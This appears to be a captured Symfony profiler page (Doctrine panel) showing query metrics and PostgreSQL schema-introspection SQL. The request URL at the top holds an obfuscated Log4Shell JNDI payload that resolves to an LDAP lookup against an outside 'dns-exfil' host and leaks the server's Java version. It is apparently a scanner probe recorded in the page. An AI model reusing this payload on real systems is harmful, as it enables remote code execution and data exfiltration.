http://rad-sdsc.ucsd.edu/${${ar8:-j}${rci7:oub:w6p:-n}${s:16s:-d}${ivt:e52u:41:-i}${1:7z8g:-:}${qi:-l}${8:-d}${q3mf:tf:9k0:-a}${gck:-p}${tg:jn:-:}${o:-/}${xrd:-/}${9u:-P}${54:-A}${ma2z:-l}${5atp:rf:u:-0}${w9:8f10:-c}${u0:--}${${a5:-s}${29nk:xmf:-y}${9z:-s}${f4q9:2r:-:}${70:d:-j}${26:42t6:-a}${hpy:ck2:-v}${rwj8:5:-a}${h642:ls:-.}${tz:d:-v}${n509:5:i9k:-e}${92:16k:wa:-r}${b:xm:-s}${r0:xd:b0wg:-i}${qw:id7:3gq4:-o}${f34:vdaj:7ydm:-n}}${u1:u:s:-.}${1:km7w:u6:-b}${4oty:wfp:-3}${c:ke83:d9y5:-4}${4tfn:w4:q93:-2}${f7v:91:0xz:-0}${x5:-d}${3:bt:x:-a}${ek:t6:l:-8}${zytv:-7}${2y9s:-2}${8fu:-2}${u1d:-6}${0s:tem:ar:-6}${7n3:mf:-c}${e4:j:-e}${2xo:-6}${l7s:-4}${m:grk:vc:-e}${zmsa:hz:-1}${y:-5}${aq:-c}${06x:-f}${r81:rc:4v9:-a}${udjh:-2}${yx:c3n:-2}${sj5:98:-e}${wvd:-a}${u:-3}${fw:n62:ce:-5}${1ps:a8:ab:-1}${mbl:-4}${5:p:7h:-0}${1l:ri3:-3}${jem:857:61:-3}${sd0l:wa:j:-8}${ewv:-f}${d0v:fi:3lb:-d}${z3tp:d16:k2:-9}${b:p:-0}${m7rw:2ol:-e}${67d:-2}${5c6k:g:l:-a}${pvf:y7d:-.}${vj:z:-d}${yqdm:wpq:-n}${29:7hf:1:-s}${jeto:--}${hso:1:n4:-e}${2:-x}${r4sl:uce:z16x:-f}${5zh:-i}${54:-l}${zv:0pl:oe:-.}${wc:-m}${sy:cd:q1:-a}${9:-s}${y:9:-m}${b:y:yh4:-c}${m:ny8:bl:-o}${x4:s7ol:02:-r}${v:g036:o7ck:-e}${sr:i2:--}${mdv8:hl64:-c}${rae:-f}${5x:4:--}${h:zpai:-p}${nai3:8:elt:-r}${o4pr:ago:-o}${hc:-d}${uzjd:zbpi:--}${zed:-0}${k:51:7rg:-2}${hp:w7o4:-.}${dr:-m}${xy:gaf5:-a}${0:vrn:-s}${9ocz:-m}${eha:-.}${ohd:9:-c}${2uc0:o:-l}${z382:e5lq:75:-o}${1ywj:awfv:5t:-u}${lx:-d}${ae10:e5:y1pn:-f}${8u:r:-e}${o2ya:s:b:-r}${5u:nfp:-r}${hbz:-y}${np9:-.}${rgny:-g}${q3b:j3oy:bl:-o}${uy:-o}${d0:aui:-g}} Return to referer URL

Query Metrics

14 Database Queries
10 Different statements
8.98 ms Query time
0 Invalid entities

Grouped Statements

Show all queries

Time Count Info
4.30 ms
(47.83%)
2
SELECT quote_ident(table_name) AS table_name,
                       table_schema AS schema_name
                FROM   information_schema.tables
                WHERE  table_schema NOT LIKE 'pg\_%'
                AND    table_schema != 'information_schema'
                AND    table_name != 'geometry_columns'
                AND    table_name != 'spatial_ref_sys'
                AND    table_type != 'VIEW'
Parameters:
[]
1.62 ms
(18.07%)
1
SELECT
                    a.attnum,
                    quote_ident(a.attname) AS field,
                    t.typname AS type,
                    format_type(a.atttypid, a.atttypmod) AS complete_type,
                    (SELECT tc.collcollate FROM pg_catalog.pg_collation tc WHERE tc.oid = a.attcollation) AS collation,
                    (SELECT t1.typname FROM pg_catalog.pg_type t1 WHERE t1.oid = t.typbasetype) AS domain_type,
                    (SELECT format_type(t2.typbasetype, t2.typtypmod) FROM
                      pg_catalog.pg_type t2 WHERE t2.typtype = 'd' AND t2.oid = a.atttypid) AS domain_complete_type,
                    a.attnotnull AS isnotnull,
                    (SELECT 't'
                     FROM pg_index
                     WHERE c.oid = pg_index.indrelid
                        AND pg_index.indkey[0] = a.attnum
                        AND pg_index.indisprimary = 't'
                    ) AS pri,
                    (SELECT pg_get_expr(adbin, adrelid)
                     FROM pg_attrdef
                     WHERE c.oid = pg_attrdef.adrelid
                        AND pg_attrdef.adnum=a.attnum
                    ) AS default,
                    (SELECT pg_description.description
                        FROM pg_description WHERE pg_description.objoid = c.oid AND a.attnum = pg_description.objsubid
                    ) AS comment
                    FROM pg_attribute a, pg_class c, pg_type t, pg_namespace n
                    WHERE n.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND c.relname = 'doctrine_migration_versions' AND n.nspname = ANY(current_schemas(false))
                        AND a.attnum > 0
                        AND a.attrelid = c.oid
                        AND a.atttypid = t.oid
                        AND n.oid = c.relnamespace
                    ORDER BY a.attnum
Parameters:
[]
0.75 ms
(8.38%)
1
SELECT quote_ident(relname) as relname, pg_index.indisunique, pg_index.indisprimary,
                       pg_index.indkey, pg_index.indrelid,
                       pg_get_expr(indpred, indrelid) AS where
                 FROM pg_class, pg_index
                 WHERE oid IN (
                    SELECT indexrelid
                    FROM pg_index si, pg_class sc, pg_namespace sn
                    WHERE sn.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND sc.relname = 'doctrine_migration_versions' AND sn.nspname = ANY(current_schemas(false))
                    AND sc.oid=si.indrelid AND sc.relnamespace = sn.oid
                 ) AND pg_index.indexrelid = oid
Parameters:
[]
0.54 ms
(5.98%)
4
SELECT CURRENT_DATABASE()
Parameters:
[]
0.43 ms
(4.78%)
1
SELECT quote_ident(r.conname) as conname, pg_catalog.pg_get_constraintdef(r.oid, true) as condef
                  FROM pg_catalog.pg_constraint r
                  WHERE r.conrelid =
                  (
                      SELECT c.oid
                      FROM pg_catalog.pg_class c, pg_catalog.pg_namespace n
                      WHERE n.nspname NOT IN ('pg_catalog', 'information_schema', 'pg_toast') AND c.relname = 'doctrine_migration_versions' AND n.nspname = ANY(current_schemas(false)) AND n.oid = c.relnamespace
                  )
                  AND r.contype = 'f'
Parameters:
[]
0.42 ms
(4.66%)
1
SELECT schema_name
FROM   information_schema.schemata
WHERE  schema_name NOT LIKE 'pg\_%'
AND    schema_name != 'information_schema'
Parameters:
[]
0.35 ms
(3.89%)
1
SELECT attnum, attname FROM pg_attribute WHERE attrelid=33130 AND attnum IN (1) ORDER BY attnum ASC
Parameters:
[]
0.27 ms
(2.96%)
1
SELECT obj_description('doctrine_migration_versions'::regclass) AS table_comment;
Parameters:
[]
0.20 ms
(2.21%)
1
SELECT * FROM doctrine_migration_versions
Parameters:
[]
0.11 ms
(1.26%)
1
SHOW search_path
Parameters:
[]

Database Connections

Name Service
default doctrine.dbal.default_connection

Entity Managers

Name Service
default doctrine.orm.default_entity_manager

Second Level Cache

Second Level Cache is not enabled.

Entities Mapping

No loaded entities.